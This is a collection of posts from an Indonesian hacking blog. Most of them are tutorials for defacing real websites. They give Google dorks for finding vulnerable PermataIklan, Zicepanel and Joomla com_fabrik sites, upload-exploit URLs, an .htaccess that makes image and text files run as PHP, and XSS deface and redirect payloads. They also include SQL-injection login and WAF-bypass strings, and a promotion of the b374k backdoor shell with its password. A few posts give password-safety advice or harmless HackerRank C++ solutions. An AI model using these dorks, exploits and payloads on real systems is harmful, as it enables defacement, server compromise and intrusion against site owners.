No Light

Setiap perusahaan penyedia social media pastinya selalu meningkatkan keamanan sistem dengan melakukan maintenance secara rutin berdasakan jadwal atau agenda yang telah di tentukan. Pengamanan secara rutin tidak hanya digunakan untuk mengamankan sistem itu sendiri. Jika sistem yang digunakan mudah dibobol perusahaan akan mendapatkan kehilangan kepercayaan dari pengguna. Pengguna akan enggan menggunakan social media tersebut karena khawatir data dan informasi pribadinya sudah tidak aman lagi.


Meskipun sebuah perusahaan menjaga ketat keamanan sistemnya, siapa sangka kalau akun dari social media dapat dibobol dengan mudah. Kelemahan selain dari sistem adalah pengguna. Pengguna kebanyakan memiliki kebiasaan mengingat kegiatan harian, orang yang penting, tanggal lahir, yang pastinya nama, saudara, keluarga, fans dll. Dengan hal-hal diatas pengguna biasanya membeberkan informasi diatas secara tidak sengaja. Bagi seorang hacker informasi minim ( dapat dikatakan sebagai jarum ) bisa menjadi senjata yang kuat ( seperti pedang ).

Pengguna biasanya sering memposting kegiatan rutinnya semisal kalau setiap pagi selalu sarapan dengan ikan atau setiap hari selalu mengunjungi saudaranya atau selalu memiliki kebiasaan dengan menggunakan angka-angka tertentu semisal “membeli barang dengan jumlah 3, menghitung dengan kelipatan 3 dsb” dengan hal tersebut kebanyakan pengguna akan menggunakannya sebagai PASSWORD akun media social, seperti contoh karena sering berkungjung ke pamannya ( berkungjung -> post ke medsos ) lalu dia menggunakan nama pamannya sebagai password atau menggunakan tanggal lahir sebagai password.

Hal-hal tersebut akan sangat berguna bagi hacker yang setiap saat mengawasi korbannya. Hacker dengan informasi diatas dan analisa yang tinggi dapat menebak password dari akun media social pengguna dengan mudah, tidak perlu membobol sistem keamanan karena pengguna tersebut dengan tanpa sadar sudah memberikan identitasnya sendiri.

Saran / Masukan / Tips & Trik / Pencegahan
Untuk mengatasi hal tersebut cukup simple :
1) Menjaga segala bentuk informasi dan tidak menyebarkan ke internet, public atau media social. Upload kegiatan atau informasi ke medos ini menjadi kebiasaan terkini yang mana itu akan menjadi boomerang bagi diri sendiri.

2) Hindari penggunaan password yang simple seperti 123456, tanggal lahir, nama, tempat dll.

3) Gunakan password yang rumit dan terdiri dari huruf kecil, huruf besar, angka, symbol. Hal ini akan menyulitkan hacker untuk menebak password.

4) Rutin mengganti password bila perlu dan jangan menggunakan satu password untuk banyak akun media social.

Terimakasih sudah membaca artikel ini. Artikel ini untuk memenuhi tugas Keamanan Jaringan

Halo sahabat No Light, bagaimana kabarnya ?? baik-baik saja kan ?? di tutorial ini saya akan membahas tentang cara mengambil atau copas artikel dari website yang sudah di proteksi. Untuk cara sebelumnya sudah saya jelaskan cara Menonaktifkan Fitur Anti Copas. Jika cara tersebut tidak berhasil maka cara ini pastinya berhasil 100%.


Untuk cara ini kalian membutuhkan Microsoft Word, karena kita akan membuka file HTML. Simak langkah-langkah berikut ini :

1) Buka halaman yang ingin anda copas artikelnya.

2) Tekan tombol keyboard Ctrl+S untuk menyimpan halaman websitenya.

3) Setelah Tersimpan buka file HTML tadi dengan Microsoft Word. Klik kanan pada filenya ->  Open With -> Microsoft Office Word.


4) Jika muncul error atau peringatan seperti ini klik OK.


5) Oke, tinggal copas artikelnya.

Happy Copas, semoga bermanfaat dan sampai jumpa pada tutorial berikutnya

Apakabar sahabat No Light ?? di tutorial kali ini saya akan membahas tentang CTF di CTF Learn. CTF Learn mirip dengan HackerRank yang mana jika kita menyelesaikan setiap permasalahan kita akan mendapatkan poin.


Permasalah pertama yang akan saya jelaskan adalah tentang Basic Injection. Untuk menyelesaikan permasalah ini kalian harus memahami tentang SQL Injection, yang dapat dilihat pada tutorial ini Bypass Login Admin. Didalam permasalah ini ada sebuah link yang harus kita injeksi.


Kita dapat menggunakan payload SQL seperti ini

'or''='
'=''or'

Sip, Flag berhasil di dapatkan, selanjutnya kita dapat men-submit flag nya.


Semoga Bermanfaat dan sampai jumpa pada tutorial berikutnya.

Kali ini saya akan membagikan tutorial untuk mendeface website iklan dengan metode XSS. Metode XSS ini boleh disebut dengan metode JSO. Metode ini sangat lah mudah, untuk kode defacenya juga sudah saya siapkan tinggal pakai saja.


Pertama-tama kita cari targetnya terlebih dahulu. Gunakan dork beriku, untuk dork dapat kalian kembangkan sendiri.

intext: "copyright © 2012 PermataIklan.com All Right Reserved"

Buka targetnya, setelah itu klik "Pasang Iklan".


Isi semua data-datanya untuk mengisi alaman website perlu diperhatikan.



Untuk injeksi XSS ke alamat web formatnya seperti ini :

nama.com">kodeXSS

Untuk full kode XSS kalian dapat gunakan dibawah ini :

zero.com"><div style="width:100%;height:100%;text-align:center;font-size:30pt;position:fixed;display:block;top:0;left:0;background:black;color:white;font-family:consolas,monospace;z-index:9999">YOUR WEBSITE HAS BEEN HACKED</div>

Terakhir klik "Pasang". Buka halaman utamanya dan BOOOM!!!. Perlu diperhatikan bahwa kalian tidak bisa terlalu banyak menggunakan Tag HTML, karena tampilannya akan rusak.


Semoga bermanfaat, Happy Hacking. "Deface adalah Seni Hacking".

Halo apa kabar ? di tutorial ini saya akan membagikan sebuah cara untuk mendeface website yang mempunyai tema Zicepanel. Seperti biasa saya tidak akan menjelaskan secara detail. Cara upload file pada tehnik deface ini menggunakan fitur uploadify dari website itu sendiri, dan karena tidak ada filter kita dapat upload file melalui client, hal ini disebut dengan tehnik CSRF.


Oke, langsung saja, pertama-tama kita cari websitenya dengan menggunakan dork :

inurl:/themes/zicepanel/

Untuk dork nya kembangan sendiri, mungkin kalian tambah dengan site, intitle dsb. Setelah kita mendapat targetnya, gunakan exploit berikut untuk mengecek file untuk uploadnya :

Expoit : /themes/zicepanel/components/uploadify/uploadify.php

Sehingga url dari websitenya menjadi seperti ini :

URL : target.com/themes/zicepanel/components/uploadify/uploadify.php

Kalau website tidak menampilkan apapun atau blank berarti website tersebut rentan dan kita dapat upload filenya. Sekarang kita tinggal upload filenya gunakan Uploader dibawah ini :

CSRF ZicePanel File Uploader

Target :


File :

Upload

Disini saya mengupload file HTML, jika muncul seperti dibawah ini berarti upload sudah berhasil.


Setelah itu kalian dapat membuka filenya dengan URL https://www.target.com/namafile yang muncul semisal :

URL : https://www.target.com/L7jeAlgEm2zxpVyX8BnUhubCadtFNks6.html

Jika kita kunjungi hasilnya seperti in :D untuk script deface saya hanya simple seperti ini



Sekian, semoga bermanfaat dan Happy Hacking Brother.

Apakabar sahabat no light ? Pastinya kalian sebel kalau kalian saat ngerjakan tugas dan nemu artikel bagus, tapi eh ketika artikelnya mau di copy paste tidak bisa. Di tutorial kali ini saya akan membagikan sebuah cara untuk mendisable CSS yang digunakan untuk mendisable copy paste artikel.


Ikuti langkah langkah berikut, di tutorial ini saya menggunakan browser firefox yang support dengan Style Editor :

1) Masuk ke Inspect Qlement dengan menekan tombol F12 pada keyboard.

2) Masuk ke tab {} Style Editor.

3) Tunggu browser menampilkan semua CSS nya, klik tanda + untuk menambahkan CSS.


4) Masukan kode CSS berikut :

* {
   -khtml-user-select: text;
   -webkit-user-select: text;
   -moz-user-select: text;
   -ms-user-select: text;
   -o-user-select: text;
    user-select: text;
    unselectable: off;
}

5) Sip, tinggal copas artikel yang kalian butuhkan.

Tapi jika kalian ingin meng-copy artikel yang lain, kalian harus tetap lakukan cara seperti diatas. Jika tidak berhasil kemungkinan proteksi copy pastenya menggunakan Javascript yang akan saya bahas pada tutorial berikutnya.

Sampai jumpa dan semoga bermanfaat.

Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi setiap tag HTML yang saya masukan selalu di hapus. Tetapi pada kasus ini nilai dari parameter ter-reflected ke tag input. Di tutorial ini saya tidak mencontohkan pada website.


Untuk website yang mempunyai filter seperti ini sangat jarang sekali. Semisal url websitenya seperti ini :

URL : website-ru.sak/search?q=zerobyte

Jika kita melihat pada kode html nya nilai dari parameter "q" ter reflected pada tag input

<input type="text" name="p" value="zerobyte">

Kalau kita memasukan payload seperti pada tutorial berikutnya Mencuri Cookie dengan XSS. Maka tag HTML apapun akan di hapus atau tidak ditampilkan. Karena petik ganda tidak di filter, kita dapat memakai payload seperti dibawah ini :

Payload: " autofocus onfocus="javascript:alert(1)

Sehingga jika payload dimasukan ke kode HTML akan menjadi seperti ini :

<input type="text" name="p" value="" autofocus onfocus="javascript:alert(1)">

Atribut autofocus pada tag input akan membuat inputan tersebut focus ( seperti saat user klik/akan mengisi inputan tersebut ), karena atribut tersebut focus kita dapat memberikan kode javascript yang di handle oleh event onfocus, dimana ketika tag input dalam kondisi focus, kode javascript akan dijalankan.

Maaf jika tidak banyak yang bisa saya sampaikan, sampai jumpa pada tutorial berikutnya.

Masih dengan hacker rank. Di materi kali ini kita akan menyelesaikan persoalan tentang Plus Minus. Permasalahannya adalah kita harus menghitung rasio atau proporsi dari jumlah bilangan positf, bilangan negatif dan bilangan 0.


Cara menyelesaikannya cukup simple saja, disini saya akan menggunakan bahasa pemrograman C++. Kalian bisa tulis di kolom komentar jika meng-inginkan bahasa pemrograman lain.

Kasus : Plus Minus

Permasalahannya seperti ini jadi semisal ada array : [-4, 3, -9, 0, 4, 1]
Kita harus menemukan berapa banyak nilai negatif, positif dan nol. Lalu masing masing dibagi dengan jumlah nilai pada array. Semisal, jumlah nilai positif 3, negatif ada 2, nol sebanyak 1.

Berarti :
3/6 = 0.50000
2/6 = 0.33333
1/6 = 0.16667

Lalu kita tampilkan masing-masing hasilnya. Untuk menyelesaikannya kita perlu :
1) Perulangan untuk mengambil tiap nilai pada array
2) Variabel untuk mengampung jumlah nilai positif, negatif dan nol.
3) Mencari banyak data, dengan menggunakan size().
4) Percabangan IF untuk mengecek setiap nilai apakah nilai positif, negatif atau nol.

Kode programnya seperti ini :
void plusMinus(vector<int> arr) {
    int i, jumlahP = 0, jumlahN = 0, jumlah0 = 0;
    int arraySize = arr.size();
    for(i = 0; i < arraySize; i++) {
        // Jika Nilai Positif
        if(arr[i] > 0) {
            jumlahP += 1;
        }
        // Jika Nilai Negatif
        else if(arr[i] < 0) {
            jumlahN += 1;

        }
        // Nilai Nol
        else {
            jumlah0 += 1;
        }
    }
    cout << (float)jumlahP / (float)arraySize <<"\n";
    cout << (float)jumlahN / (float)arraySize <<"\n";
    cout << (float)jumlah0 / (float)arraySize;
}

Sukses, semoga permanfaat.

Untuk tutorial kali ini saya akan membahas tentang pemrograman yang mana saya akan menunjukan cara untuk menyelesaikan sebuah permasalahan pemrograman. Jadi nantinya akan ada banyak challenge pemrograman dari yang mudah sampai yang sulit. Jadi challenge pemrograman ini dari website Hacker Rank. Kalian dapat mengunjungi wesite Hacker Rank. Tetapi website ini berbahasa inggris jika kalian ingin menjadi programmer kalian harus mempelajari bahasa inggris.


Oke, langsung mulai saja, saya akan menggunakan bahasa C++ untuk menyelesaikan kasus ini. Kasusnya adalah simple array sum, yang mana kita harus menjumlahkan setiap nilai pada array yang diberikan. Disini saya tidak akan mengajarkan dasar dari pemrograman.

Kasus : Simple Array Sum

Nama variable dari array nya adalah "ar" yang berada para parameter fungsi "simpleArraySum". Yang kita perlukan diantaranya :
1) Perulangan, kita perlu cara untuk mengambil nilai dari setiap array mulai dari array 0 - terakhir
2) Jumlah panjang array, panjang array maksudnya adalah jumlah bilangan yang berada pada array. Kita bisa memakai fungsi size().
3) Mengambil nilai array, dengan namaArray[index].


Kode programnya seperti ini :

int simpleArraySum(vector<int> ar) {
    int i, jumlah = 0;
    for(i = 0; i < ar.size(); i++) {
        jumlah += ar[i];
    }
    return jumlah;
}

Sukses, kasus berhasil terselesaikan. Semoga bermanfaat dan selamat ngoding.

Kali ini saya hanya akan membagikan sebuah buku tentang hacking. Materi yang didalamnya sangat banyak seperti sniffing, phishing, backdoor, dos attack, port scanning dll. Di kebanyakan website memang sudah membagikan buku ini, tetapi tidak lengkap. Di buku ini saya sudah melengkapi halaman-halaman yang kurang.


Kalian bisa download di link ini, kalian sudah tidak perlu memasukan password lagi, tinggal pakai saja :D Tapi di buku ini akan saya bahas ulang di blog ini.


Download :
LINK !!!

Semoga bermanfaat jika ada halaman yang kurang setiap ganti ke materi selanjutnya. Itu adalah halaman awal dari setiap materi. Jangan khawatir halaman itu tidak terlalu penting.

Di tutorial ini saya akan mebagikan sebuah cara unik untuk menonton video youtube tanpa menampilkan iklanm yaitu dengan fitur embed video dari youtube itu sendiri. Fitur embed pada youtube biasanya digunakan untuk menyisipkan video-video pada blog atau website, yang mana kita dapat memutarnya secara langsung tanpa mengunjungi halaman youtube.


Dan ini berlaku untuk yang menggunakan browser. So, caranya cukup simple. Kalian kunjungi youtube seperti biasanya dan buka videonya. Semisal URL videonya seperti ini :

URL : https://www.youtube.com/watch?v=3Kq1MIfTWCE

Kalian ganti URL nya menjadi seperti ini.

URL : https://www.youtube.com/embed/3Kq1MIfTWCE

Kalau kalian kunjungi URL tersebut kalian akan membuka video youtube dengan tampilan semi-full seperti di bawah ini. Kalian juga tetap bisa mengatur resolusi, subtitle dan kecepatannya.


Semoga bermanfaat dan sampai jumpa.

Kali ini saya tidak membahas tehnik-tehnik haking, melainkan saya akan membagikan kepada kalian shell backdoor yang sering saya gunakan. Menurut saya shell backdoor ini adalah shell backdoor terbaik dari shell backdoor lain yang beredar di internet.


Shell backdoor terbaik yaitu b374k versi 3.2.3 :

B374K Versi 3.2.3
B374K yang dapat dibaca bejak atau becak adalah shell backdoor yang menurut saya paling populer, shell ini pembuatnya adalah orang Indonesia. B374K memiliki banyak fitur. Untuk mengakses shell ini kalian harus memasukan password, password nya adalah "b374k".


Fitur yang paling membuat saya berkesan diantaranya :
A. Di bar paling atas kita dapat masuk ke disk drive manapun, pada gambar di atas terdapat drive C, E, J, dan O.

B. Di fitur Explorer terdapat action diantaranya: compress dan extract file Zip, copy-paste-delete, dan action untuk mengganti permission sebuah file atau folder.

C. Server Info, di fitur ini dapat mengetahui informasi drive dan informasi PHP secara lengkap.

D. Network, di fitur ini ada 3 hal yang dapat kita lakukan yaitu Bind Shell, Reverse Shell, Simple Packet Crafter

E. Processes, di fitur ini menurut saya unik yaitu bisa menampilkan proses apa saja yang berjalan yang menyerupai task manager pada windows, kita juga bisa menutup ( kill ) proses tersebut.

Mengapa shell ini saya katakan terbaik ?
- Shell ini memiliki banyak fitur dari shell backdoor yang lain.
- UI lebih user friendly karena enak di pandang
- Memiliki ukurang yang kecil, meskipun memiliki banyak fitur yang untuk tetapi untuk ukuran file juga tidak besar hanya berukurang sekitar 200kb.

Tetapi selain shell b374k ada shell lain yang bernama WSO, tampilan dan fiturnya juga bagus tetapi karena versi PHP yang saya gunakan adalah versi 7 saya tidak bisa membuka shell WSO karena ada satu function yang sudah tidak bisa dijalankan lagi di PHP versi 7.

Download B374K :
LINK !!!

Oke, segitu saja dari saya. Semoga bermanfaat dan sampai jumpa pada materi berikutnya.

Halo gengs apakabar ? kali ini saya akan membagikan tutorial deface website yang menggunakan CMS Joomla. Trik deface ini memanfaatkan sebuah halaman untuk upload file CSV. File CSV sendiri adalah sebuah dokumen table yang mirip dengan document excel tetapi lebih ringkas dan sederhana. Namun pada saat upload file, tidak hanya file dengan format CSV saja yang dapat di upload melainkan file seperti Image, HTML dan PHP juga dapat di upload.


Seperti biasa disini saya akan menyensor sepenuhnya website-website yang saya tunjukan disini, karena website ini memiliki disclaimer yang mana hanya untuk tujuan pembelajaran saja, untuk targetnya kalian dapat mencarinya dengan dork berikut ini :

inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:ru
inurl:viewTable?cid= site:ac
inurl:viewTable?cid= site:id
inurl:viewTable?cid= site:my
inurl:viewTable?cid= site:co

Jika pencarian website nya cukup susah kalian bisa hilangkan site dan titik ganda setelah inurl.  Website yang menjadi target ciri-ciri URL nya seperti ini :

URL-1 : website-ru.sak/index.php?option=com_fabrik&task=viewTable&cid=9


URL-2 : https://rusakin.aja/component/fabrik/viewTable?cid=


Jika dilihat dari tampilan kedua website diatas dapat dilihat bahwa halaman menampilkan tulisan "Sorry this form..." berarti website tersebut dapat di beri exploit, gunakan exploit dibawah ini :

Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Setelah di exploit nantinya website akan menampilkan sebuah halaman form Import CSV. Lalu pilih file dan klik tombol upload.


Secara umum file akan berada pada folder media jadi buka file dengan URL seperti ini, jika file tidak ada atau tidak dapat dibuka berarti CMS tersebut sudah di patch atau di tambal celahnya :

URL : alamat-website.com/media/nama-file.html

Happy hacking dan sampai jumpa pada tutorial berikutnya.


Tulis di kolom komentar jika belum ada yang kalian pahami.

Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi website yang saya test kerentanannya ini memiliki celah XSS yang mana parameter URL ter-reflected pada kode Javascript. Untuk tutorial ini saya akan mencoba pada website local.


Jika kita lihat pada tampilan websitenya tidak ada reflected apapun. Tetapi bila kita lihat melalui inspect element kita dapat melihat bahwa nilai dari parameter ter-reflected kedalamnya.


Karena ter-reflected kedalam sebuah string kita dapat mengexploitasinya dengan mudah. Ada 2 cara yang dapat dilakukan yang pastinya jika kondisinya berbeda.

1) Jika TAG html tidak terfilter termasuk tag script, kita dapat menggunakan payload

Payload: </script><script>alert(1)</script>

Ganti alert(1) dengan kode javascript kalian. Jika menggunakan payload diatas kita website akan menampikan dialog alert.

2) Jika TAG html difilter kita dapat menggunakan payload seperti ini, alert() akan memunculkan sebuah dialog dengan tulisan tertentu.

Payload: "-alert(1)-"

atau jika kalian ingin target langsung mengunjungi website tertentu, gunakan kode javascript location replace

Payload: "-window.location.replace("https://google.com")-"

Oke, itu saja untuk tutorial kali ini dan maaf jika tidak banyak yang bisa saya terangkan pada tutorial ini semoga bermanfaat dan sampai jumpa pada tutorial berikutnya.

Di materi kali ini saya tidak membahas tentang tehnik-tehnik hacking seperti sebelumnya. Disini saya akan membahas secara teori cara-cara untuk mendapatkan sebuah informasi dari user atau pengguna. Saya tidak akan membahas terlalu banyak dan bertele-tele, saya akan menjelaskan poin pentingnya saja.


Sumber informasi di dunia ini sangatlah banyak. Informasi yang bisa didapatkan antara lain Kartu Kredit, SIM ( Surat Ijin Mengemudi ), KTP, KK, Passport, Nama, Alamat, Nomor Telephone, Kartu Identitas, Buku Tabungan, dll. Lalu bagaimana seorang penyerang dapat menemukan informasi tersebut ? Ada beberapa cara untuk mendapatkan informasi penting diatas :

1) Phishing
Mungkin bagi kalian sudah tidak asing lagi dengan kata phishing, phishing secara umum dikenal dengan website palsu yang mana akan memperdayai korban sehingga korban tanpa sadar akan memberikan informasinya sendiri.

2) Social Engineering
Sosial Engineering dikenal dengan sebuah seni untuk memanipulasi manusia secara emosional untuk mendapatkan informasi sensitif. Dalam melakukan ini kita harus pintar dalam bicara dan pintar mengelabuhi korban.

3) Hacking
Hacking berarti sebuah aksi untuk meretas sistem yang digunakan korban. Sistem yang dapat diretas diantaranya website, komputer dan HP / Smart Phone. Tehnik hacking sendiri bermacam-macam, seperti SQLi, CSRF, MITM dll.

4) Pencurian Data Pribadi
Pencurian informasi seperti SIM, KTP, Kartu Kredit atau informasi sensitif lainnya dapat didapatkan melalui HP / Smart Phone, dompet dan jika kalian pernah menonton film "Who Am I" informasi didapatkan melalui sampah.


Apa yang dapat dilakukan dengan informasi diatas ? Bagi seorang hacker informasi secuil kertas pun sangat berguna, informasi yang sangat kecil bisa menjadi informasi yang besar dan berguna.

1) Pencurian dalam Bentuk Keuangan
Pencurian dalam bentuk keuangan biasanya terjadi pada kartu kredit, kartu kredit dapat mudah di duplikasi dan mudah untuk dibawa kemanapun.

2) Pemalsuan Perseorangan / Perusahaan
Dengan informasi seperti identitas diri atau perusahaan, hacker dapat dengan mudah berpura-pura sebagai seseorang dan / atau mengatasnamakan perusahaan tertentu untuk mengelabuhi target.

3) Penjualan Data
Beberapa hari / bulan yang lalu terdapat kasus penjualan data penduduk secara ilegal. Data informasi dari penduduk harganya juga cukup tinggi tergantung dari kelengkapan dan kesensitifan data.

4) Pembocoran Informasi
Biasanya informasi atau dokumen perusahaan atau pemerintah yang bocor dan tersebar di media sosial dikarenakan karena kegiatan di atas.


Lalu bagaimana mengatasi pencurian informasi penting. Ada beberapa hal yang dapat dilakukan, diantaranya :

1) Jangan sembarangan meletakkan atau membuang informasi penting.

2) Jika kartu kredit atau kartu ATM hilang, dapat menghubungi pihak bank untuk menonaktifkannya.

3) Untuk sebuah website, dapat ditingkatkan keamanannya dengan cara maintenance rutin.

4) Teliti dalam menampilkan informasi dari sebuah akun di media sosial. Hindari untuk mempublish informasi sensitif.

5) Hindari website-website yang kurang terpercaya.


Saya harap informasi diatas dapat bermanfaat. Jika ada yang ditanyakan silahkan tulis di kolom komentar. Sekian dari saya dan sampai jumpa pada materi berikutnya.

Halo sahabat No Light, di tutorial ini saya akan menjelaskan sebuah cara untuk mendeface website yang menggunakan CMS Joomla. Deface dengan cara ini juga dapat mengganti tampilan halaman home dari sebuah website, mungkin lebih banyak dikenal dengan sebutan tebas index, yang mana file yang kita upload ke server adalah file htaccess.


Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com

Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Sehingga URL nya menjadi seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.


Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :

DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

CSRF Com_Fabrik File Uploader

Target :


File :

Upload

Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :

{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}

Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.

Di tutorial kali ini saya akan menunjukan sebuah cara untuk mengganti MAC Address komputer, namun tidak sepenuhnya mengganti MAC Address-nya. MAC Address komputer hanya akan di masking atau ditutup dengan MAC Address yang paslu. Untuk toolsnya dapat kalian download di website ini TMAC Changer.


Ikuti langkah-langkah berikut untuk mengganti MAC Addressnya :
1) Pilih "Network Connection" semisal untuk Wireless Network Connection yang mana itu adalah koneksi Wi-Fi.

2) Ada 2 cara yang dapat lakukan untuk mengganti MAC nya :
- Pertama kalian dapat menuliskan sendiri MAC Addressnya.
- Kedua, dapat menggunakan MAC Address yang disediakan

3) Klik "Change Now!" untuk menerapkan MAC Address.

4) Jika ada peringatan / error, centang "use 02 as first octet..".


Untuk memastikan apakah MAC Address benar-benar berganti, kalian bisa cek melalui CMD dengan menggunakan perintah :

ipconfig /all



Semoga tutorial ini bermanfaat dan tulis dikolom komentar jika ada yang tidak dipahami. Dan sampai jumpa pada tutorial berikutnya.

Kali ini saya akan membahas sebuah cara untuk membypass WAF SQLi. WAF bekerja ketika kita mencoba untuk meng-injeksi query SQL dan website memunculkan halaman "403 Forbidden" atau "406 Not Acceptable". WAF adalah Web Application FireWall. WAF akan mengecek setiap inputan yang dilakukan oleh pengguna. Di tutorial ini saya akan membahasnya secara singkat.


Tampilan error 403 dan 406 seperti berikut, tetapi nama websitenya saya ganti ( sensor ) karena saya tidak ingin menunjukan kerentanan website atau aplikasi yang belum di patch.



Caranya cukup gampang kalian tinggal tambahkan query menjadi /*!query*/. Saya tunjukan sebagian contohnya, untuk yang lain bisa kalian coba-coba sendiri.

and -- /*!and*/
1=1 -- /*!1=1*/
union -- /*!union*/
select 1,2,3.. -- /*!select 1,2,3,4,5...*/ atau /*!select*/ 1,2,3,4,5...
order by 1 -- /*!order by 1*/

Jika cara diatas tidak bisa kalian dapat tambahkan angka setelah tanda seru "!".

union -- /*!5000union*/
and -- /*!123and*/
union select 1,2,3... -- /*!12union*/ /*!34select*/ 1,2,3,...

Untuk tehnik bypass WAF yang lain dan lebih banyak kalian dapat mengunjungi halaman ini SQLi Bypassing WAF. Oke itu saja untuk tutorial kali ini semoga bermanfaat dan Happy Hacking. Sampai jumpa pada tutorial berikutnya.

Jika kalian sudah mempelajari tentang XSS, di tutorial kali ini saya akan menunjukan salah satu dampak yang dapat ditimbulkan dari serangan XSS yaitu Defacing. Deface yaitu mengubah tampilan dari sebuah website. Di tutorial ini saya akan menguji pada website local.


Di website ada sebuah kolom komentar, yang mana kita dapat memasukan nama dan sebuah komentar.


Untuk stored XSS, kode XSS akan disimpan didalam database. Jadi untuk stored XSS bersifat permanen, tidak seperti reflected XSS yang dapat terjadi jika user mengunjungi link yang ada payload XSS nya.

Jika kita memasukan payload dibawah ini pada kolom komentar kita akan mendapatkan kotak dialog alert. Siapapun yang mengunjungi link tersebut akan melihat sebuah kotak dialog.

Payload : <img src='x' onerror='alert(1)'>

Bagaimana jika payload nya seperti ini :

Payload : <script>document.documentElement.innerHTML = "<body style='background:black;color:white;'><h1>Your Website Has Been Hacked</h1></body>"</script>

*document.documentElement.innerHTML untuk mengubah kode HTML yang ditampilkan di website.

Hasilnya seperti ini, website sudah berhasil di deface dengan metode Stored XSS.


Tehniknya sangat sederhana namun dampaknya sangat besar. Segitu saja untuk tutorial kali ini semoga bermanfaat, silahkan bertanya di kolom komentar jika ada yang kurang dimengerti. Sampai jumpa pada tutorial berikutnya.

Apa kabar sahabat No Light ? pernahkah kalian melihat kode javacript pada template blogger yang cukup susah untuk dibaca ? Nah untuk kali ini saya akan membahas sebuah kode javascript yang dapat di pack sehingga sulit untuk dibaca alurnya. Biasanya kode javascript yang di pack ditandai dengan sebuah fungsi dengan parameter "p,a,c,k,e,d".


Di tutorial kali ini saya akan menunjukan langkah-langkah untuk mem-pack kode javascript dan meng-unpack. Sebelum itu saya akan menunjukan contoh kode javascript yang sudah di pack.


Untuk meng-unpack kode diatas kita akan menggunakan tool pack-unpack buatan Dean Edwards. Kalian dapat mengunjungi website UNPACKER. Ikuti langkah berikut :
1) Copy kode javascriptnya


2) Paste pada kolom paste dan klik unpack.


Untuk mem-pack kode javascript kita masih akan memakai tool dari Dean Edwards. Kunjungi PACKER. Ikuti langkah berikut :
1) Copy kode javascriptnya


2) Paste kode javascriptnya di kolom Paste. Centang "base62 encode". Klik tombol Pack


Mudah bukan ? oke, segitu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada tutorial berikutnya.